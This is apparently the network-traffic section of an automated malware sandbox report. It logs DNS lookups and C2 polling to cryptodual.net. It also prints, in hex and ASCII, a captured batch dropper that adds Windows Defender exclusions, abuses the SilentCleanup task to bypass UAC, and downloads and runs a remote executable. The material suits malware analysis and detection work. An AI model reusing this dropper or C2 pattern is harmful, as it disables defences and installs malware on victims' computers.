                                                                Jan 4, 2021 19:15:42.029673100 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.029687881 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.029689074 CET49170443192.168.2.22172.67.167.122
                                                                Jan 4, 2021 19:15:42.029696941 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.029736996 CET49170443192.168.2.22172.67.167.122
                                                                Jan 4, 2021 19:15:42.029814959 CET49170443192.168.2.22172.67.167.122
                                                                Jan 4, 2021 19:15:42.029906988 CET49170443192.168.2.22172.67.167.122
                                                                Jan 4, 2021 19:15:42.029989004 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.030033112 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.030050039 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.030066013 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.030083895 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.030101061 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.030114889 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.030121088 CET49170443192.168.2.22172.67.167.122
                                                                Jan 4, 2021 19:15:42.030128002 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.030138969 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.030165911 CET49170443192.168.2.22172.67.167.122
                                                                Jan 4, 2021 19:15:42.030204058 CET49170443192.168.2.22172.67.167.122
                                                                Jan 4, 2021 19:15:42.030478001 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.030517101 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.030534983 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.030550957 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.030566931 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.030582905 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.030599117 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.030612946 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.030639887 CET49170443192.168.2.22172.67.167.122
                                                                Jan 4, 2021 19:15:42.030693054 CET49170443192.168.2.22172.67.167.122
                                                                Jan 4, 2021 19:15:42.030976057 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.031013966 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.031042099 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.031059980 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.031091928 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.031096935 CET49170443192.168.2.22172.67.167.122
                                                                Jan 4, 2021 19:15:42.031106949 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.031121969 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.031133890 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.031140089 CET49170443192.168.2.22172.67.167.122

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Jan 4, 2021 19:15:31.045967102 CET5219753192.168.2.228.8.8.8
                                                                Jan 4, 2021 19:15:31.102055073 CET53521978.8.8.8192.168.2.22
                                                                Jan 4, 2021 19:15:31.700972080 CET5309953192.168.2.228.8.8.8
                                                                Jan 4, 2021 19:15:31.749100924 CET53530998.8.8.8192.168.2.22
                                                                Jan 4, 2021 19:15:31.758227110 CET5283853192.168.2.228.8.8.8
                                                                Jan 4, 2021 19:15:31.806416988 CET53528388.8.8.8192.168.2.22
                                                                Jan 4, 2021 19:15:41.397423029 CET6120053192.168.2.228.8.8.8
                                                                Jan 4, 2021 19:15:41.475958109 CET53612008.8.8.8192.168.2.22
                                                                Jan 4, 2021 19:16:01.753098011 CET4954853192.168.2.228.8.8.8
                                                                Jan 4, 2021 19:16:01.801085949 CET53495488.8.8.8192.168.2.22
                                                                Jan 4, 2021 19:17:03.633133888 CET5562753192.168.2.228.8.8.8
                                                                Jan 4, 2021 19:17:03.703593016 CET53556278.8.8.8192.168.2.22

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                Jan 4, 2021 19:15:31.045967102 CET192.168.2.228.8.8.80x5cccStandard query (0)cutt.lyA (IP address)IN (0x0001)
                                                                Jan 4, 2021 19:15:41.397423029 CET192.168.2.228.8.8.80x44f5Standard query (0)cryptodual.netA (IP address)IN (0x0001)
                                                                Jan 4, 2021 19:16:01.753098011 CET192.168.2.228.8.8.80x155dStandard query (0)cryptodual.netA (IP address)IN (0x0001)
                                                                Jan 4, 2021 19:17:03.633133888 CET192.168.2.228.8.8.80xba01Standard query (0)cryptodual.netA (IP address)IN (0x0001)

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                Jan 4, 2021 19:15:31.102055073 CET8.8.8.8192.168.2.220x5cccNo error (0)cutt.ly172.67.8.238A (IP address)IN (0x0001)
                                                                Jan 4, 2021 19:15:31.102055073 CET8.8.8.8192.168.2.220x5cccNo error (0)cutt.ly104.22.0.232A (IP address)IN (0x0001)
                                                                Jan 4, 2021 19:15:31.102055073 CET8.8.8.8192.168.2.220x5cccNo error (0)cutt.ly104.22.1.232A (IP address)IN (0x0001)
                                                                Jan 4, 2021 19:15:41.475958109 CET8.8.8.8192.168.2.220x44f5No error (0)cryptodual.net172.67.167.122A (IP address)IN (0x0001)
                                                                Jan 4, 2021 19:15:41.475958109 CET8.8.8.8192.168.2.220x44f5No error (0)cryptodual.net104.27.187.220A (IP address)IN (0x0001)
                                                                Jan 4, 2021 19:15:41.475958109 CET8.8.8.8192.168.2.220x44f5No error (0)cryptodual.net104.27.186.220A (IP address)IN (0x0001)
                                                                Jan 4, 2021 19:16:01.801085949 CET8.8.8.8192.168.2.220x155dNo error (0)cryptodual.net172.67.167.122A (IP address)IN (0x0001)
                                                                Jan 4, 2021 19:16:01.801085949 CET8.8.8.8192.168.2.220x155dNo error (0)cryptodual.net104.27.187.220A (IP address)IN (0x0001)
                                                                Jan 4, 2021 19:16:01.801085949 CET8.8.8.8192.168.2.220x155dNo error (0)cryptodual.net104.27.186.220A (IP address)IN (0x0001)
                                                                Jan 4, 2021 19:17:03.703593016 CET8.8.8.8192.168.2.220xba01No error (0)cryptodual.net172.67.167.122A (IP address)IN (0x0001)
                                                                Jan 4, 2021 19:17:03.703593016 CET8.8.8.8192.168.2.220xba01No error (0)cryptodual.net104.27.186.220A (IP address)IN (0x0001)
                                                                Jan 4, 2021 19:17:03.703593016 CET8.8.8.8192.168.2.220xba01No error (0)cryptodual.net104.27.187.220A (IP address)IN (0x0001)

                                                                HTTP Request Dependency Graph

                                                                • 37.46.150.139
                                                                • cryptodual.net

                                                                HTTP Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                0192.168.2.224916937.46.150.13980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jan 4, 2021 19:15:33.429898024 CET70OUTGET /bat/scriptxls_27c96e3c-9015-4716-8c85-64582d96aaaf_zilla07_wdexclusion.bat HTTP/1.1
                                                                Host: 37.46.150.139
                                                                Connection: Keep-Alive
                                                                Jan 4, 2021 19:15:33.482979059 CET72INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:15:33 GMT
                                                                Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.4.12
                                                                Last-Modified: Mon, 04 Jan 2021 15:32:06 GMT
                                                                ETag: "7e4-5b814caeb9285"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 2020
                                                                Keep-Alive: timeout=5, max=100
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-msdownload
                                                                Data Raw: 6d 6f 64 65 20 31 38 2c 31 0d 0a 63 6f 6c 6f 72 20 46 45 0d 0a 73 65 74 6c 6f 63 61 6c 0d 0a 66 6f 72 20 2f 66 20 22 74 6f 6b 65 6e 73 3d 34 2d 35 20 64 65 6c 69 6d 73 3d 2e 20 22 20 25 25 69 20 69 6e 20 28 27 76 65 72 27 29 20 64 6f 20 73 65 74 20 56 45 52 53 49 4f 4e 3d 25 25 69 2e 25 25 6a 0d 0a 69 66 20 22 25 76 65 72 73 69 6f 6e 25 22 20 3d 3d 20 22 31 30 2e 30 22 20 28 20 65 63 68 6f 20 22 57 69 6e 64 6f 77 73 20 31 30 20 64 65 74 65 63 74 65 64 22 20 0d 0a 72 65 67 20 61 64 64 20 22 48 4b 43 55 5c 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 20 2f 76 20 22 77 69 6e 64 69 72 22 20 2f 64 20 22 63 6d 64 20 2f 63 20 73 74 61 72 74 20 70 5e 6f 77 65 72 73 68 5e 65 6c 5e 6c 20 2d 77 20 31 20 41 64 64 2d 4d 70 50 72 65 66 65 72 65 6e 63 65 20 2d 45 78 63 6c 75 73 69 6f 6e 50 61 74 68 20 22 24 65 6e 76 3a 74 65 6d 70 22 20 3b 41 64 64 2d 4d 70 50 72 65 66 65 72 65 6e 63 65 20 2d 45 78 63 6c 75 73 69 6f 6e 50 61 74 68 20 22 24 65 6e 76 3a 61 70 70 64 61 74 61 22 20 3b 53 74 61 72 74 2d 53 6c 65 65 70 20 31 32 3b 20 28 4e 65 77 2d 4f 62 6a 65 63 74 20 4e 65 74 2e 57 65 62 43 6c 69 65 6e 74 29 2e 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 28 27 68 74 74 70 73 3a 2f 2f 63 72 79 70 74 6f 64 75 61 6c 2e 6e 65 74 2f 73 76 63 68 6f 73 74 2e 65 78 65 27 2c 28 24 65 6e 76 3a 74 65 6d 70 29 2b 27 5c 70 73 2e 65 78 65 27 29 3b 53 74 61 72 74 2d 53 6c 65 65 70 20 32 3b 20 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 24 65 6e 76 3a 74 65 6d 70 5c 70 73 2e 65 78 65 3b 26 52 45 4d 20 22 20 3e 6e 75 6c 0d 0a 74 69 6d 65 6f 75 74 20 2f 74 20 32 20 3e 6e 75 6c 0d 0a 73 63 68 74 61 73 6b 73 20 2f 72 75 6e 20 2f 74 6e 20 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 44 69 73 6b 43 6c 65 61 6e 75 70 5c 53 69 6c 65 6e 74 43 6c 65 61 6e 75 70 20 2f 49 20 3e 6e 75 6c 0d 0a 74 69 6d 65 6f 75 74 20 2f 74 20 33 20 3e 6e 75 6c 0d 0a 72 65 67 20 64 65 6c 65 74 65 20 22 48 4b 43 55 5c 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 20 2f 76 20 22 77 69 6e 64 69 72 22 20 2f 46 0d 0a 29 0d 0a 69 66 20 22 25 76 65 72 73 69 6f 6e 25 22 20 3d 3d 20 22 36 2e 33 22 20 28 20 65 63 68 6f 20 22 57 69 6e 64 6f 77 73 20 38 2e 31 20 64 65 74 65 63 74 65 64 22 20 0d 0a 72 65 67 20 61 64 64 20 22 48 4b 43 55 5c 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 20 2f 76 20 22 77 69 6e 64 69 72 22 20 2f 64 20 22 63 6d 64 20 2f 63 20 73 74 61 72 74 20 70 5e 6f 77 65 72 73 68 5e 65 6c 5e 6c 20 2d 77 20 31 20 41 64 64 2d 4d 70 50 72 65 66 65 72 65 6e 63 65 20 2d 45 78 63 6c 75 73 69 6f 6e 50 61 74 68 20 22 24 65 6e 76 3a 74 65 6d 70 22 20 3b 41 64 64 2d 4d 70 50 72 65 66 65 72 65 6e 63 65 20 2d 45 78 63 6c 75 73 69 6f 6e 50 61 74 68 20 22 24 65 6e 76 3a 61 70 70 64 61 74 61 22 20 3b 53 74 61 72 74 2d 53 6c 65 65 70 20 31 32 3b 20 28 4e 65 77 2d 4f 62 6a 65 63 74 20 4e 65 74 2e 57 65 62 43 6c 69 65 6e 74 29 2e 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 28 27 68 74 74 70 73 3a 2f 2f 63 72 79 70 74 6f 64 75 61 6c 2e 6e 65 74 2f 73 76 63 68 6f 73 74 2e 65 78 65 27 2c 28 24 65 6e 76 3a 74 65 6d 70 29 2b 27 5c 70 73 2e 65 78 65 27 29 3b 53 74 61 72 74 2d 53 6c 65 65 70 20 32 3b
                                                                Data Ascii: mode 18,1color FEsetlocalfor /f "tokens=4-5 delims=. " %%i in ('ver') do set VERSION=%%i.%%jif "%version%" == "10.0" ( echo "Windows 10 detected" reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 Add-MpPreference -ExclusionPath "$env:temp" ;Add-MpPreference -ExclusionPath "$env:appdata" ;Start-Sleep 12; (New-Object Net.WebClient).DownloadFile('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;&REM " >nultimeout /t 2 >nulschtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nultimeout /t 3 >nulreg delete "HKCU\Environment" /v "windir" /F)if "%version%" == "6.3" ( echo "Windows 8.1 detected" reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 Add-MpPreference -ExclusionPath "$env:temp" ;Add-MpPreference -ExclusionPath "$env:appdata" ;Start-Sleep 12; (New-Object Net.WebClient).DownloadFile('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2;


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                1192.168.2.2249171172.67.167.12280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jan 4, 2021 19:16:01.877512932 CET1285OUTPOST /cc/gate.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: http generic
                                                                Host: cryptodual.net
                                                                Content-Length: 87
                                                                Cache-Control: no-cache
                                                                Data Raw: 48 57 49 44 3d 7b 38 34 36 65 65 33 34 30 2d 37 30 33 39 2d 31 31 64 65 2d 39 64 32 30 2d 38 30 36 65 36 66 36 65 36 39 36 33 7d 26 6e 61 6d 65 3d 41 6c 62 75 73 2f 30 36 31 35 34 34 26 6f 73 3d 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e 61 6c
                                                                Data Ascii: HWID={846ee340-7039-11de-9d20-806e6f6e6963}&name=user/061544&os=Windows 7 Professional
                                                                Jan 4, 2021 19:16:02.812693119 CET1286INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:02 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Set-Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161; expires=Wed, 03-Feb-21 18:16:01 GMT; path=/; domain=.cryptodual.net; HttpOnly; SameSite=Lax
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0770360e7b0000d6d92a8f0000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=9owAiYaRznDgpbgcTeFGU%2BexJ0xaDm%2FJssTXoDRgbp59jmLzUQ6YrhQY36Skv2jZGO4qHDbmuE6C7y%2Bz4JZ%2BGH0TDoiVQ5rFfoALvrk%2Fug%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f2c3ffd4d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:02.870225906 CET1287OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:03.162255049 CET1287INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:03 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 077036125e0000d6d93d35d000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=B9r908AHLAjv%2BajjajS0gl0%2FjH38CJa%2B63pjZnYx237rcr%2B26I8fvAzPTZoCT%2BrJkaqHvtzUzu5JZo9MgWqedIw1%2F%2FstbBCqmNBGx6%2BKFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f2ca3dcad6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:03.164614916 CET1288OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:03.547535896 CET1288INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:03 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703613920000d6d9fbb97000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Q9EMkYjT1GpIlgBBSuXZtwe%2F0Bvhu5442NgrgBeYoeCnEJe3Ifq7FuZDIFYyz%2FXNagqtYp4ffdVzf%2FfGhvBeutgZgslLc6zW3pNlTpJpog%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f2cc0a70d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:03.550128937 CET1289OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:03.685976982 CET1289INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:03 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 077036150a0000d6d940987000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=%2BpNL0RsNrvfKOucakf2Ma32aSQOl%2BLefh2E0n%2BXmX1bYuNuuJEJp9x0W4zS5DjMGcVSoez00X7AtJ%2Bq4uxw6D4T%2FV2y69SRuknjYExyU%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f2ce6f9dd6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:03.695874929 CET1290OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:03.775778055 CET1290INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:03 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703615950000d6d9618ee000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=6u3PLa86bkZkmixVT6Um%2FGUTPYdIG2KHIPbUk%2F4inJFsXMAsS%2BvZcdOZQoi0yuJdWijKK8vjr9h%2Br4lxADo6G9iLn3o1cUX0%2BGYvrjWdQg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f2cf599ed6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:08.788014889 CET1291OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:08.878509045 CET1292INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:08 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703629790000d6d9640c3000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ENJ8wRbMogDfKRp1aECL90MnUBkGOP6BpdDKUXqMz%2BSlAKFhWFjQhF%2BDk%2BBliXv04RNhfkqmdN5M0CwkEyla%2BtXeEF4bY3Hgp2rm4Hs8oA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f2ef2942d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:08.880536079 CET1292OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:08.966378927 CET1293INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:08 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703629d50000d6d9281d9000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=3M7BA5XhVtxC2Q%2B1dK1unJcBi3d%2F8U4mpwhBadFqbCHOiKEHl2%2Bqo%2B2N%2FKz6uuinhSycpKrfgJeU3ytClUMn9EWqFsE2d711kPFcaxHAtw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f2efba8fd6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:08.968307972 CET1293OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:09.064079046 CET1294INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:09 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0770362a2d0000d6d923811000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Odjukxx6Q4FXoSpj4pmqYtcdQ%2FVI9GdcsPqBhHIOXQN5lmbyFC4i%2BHr15j25hGjUJwmHnj3%2Byni5dlWHs58e%2Fc5y7UK%2FFDxm4zTe%2FDiETw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f2f04bc2d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:09.066073895 CET1294OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:09.148210049 CET1295INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:09 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0770362a8f0000d6d96f09d000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=%2B1CfGJlUs7ozYB7z1doE6fcSK3v96tYdjCH4s4XSwMOwzB98j6oOrVlBTaSVdX2gsc5FDTpaGIMu8cb%2BGGv%2FaCEqI8LEIa7ppVpZhtmcPg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f2f0ed2fd6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:14.156342983 CET1295OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:14.240035057 CET1296INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:14 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0770363e710000d6d961858000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=OglaMpq6sB3wo567jFNXxdnKx2upihd5VhO7IKBae18k5Z4STSCmYA6HBWnVSWaHtTpJpXQUyTStN%2BAe%2FG0UncpgXFkUoxpu2aZ6ojOK4g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f310b80ad6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:14.243232012 CET1296OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:14.371928930 CET1297INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:14 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0770363ec90000d6d90dafa000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=jqIUgOK5vcYG9ND1o7OzzKKJAvaMIqkow56foLpPZu5uOfArxHlcGSPRErDPl1mE3uZvfDzhGiN86N9rLujh%2B66kWaKHFQ8%2F83N5lpzwFA%3D%3D"}],"group":"cf-nel","max_age":604800}
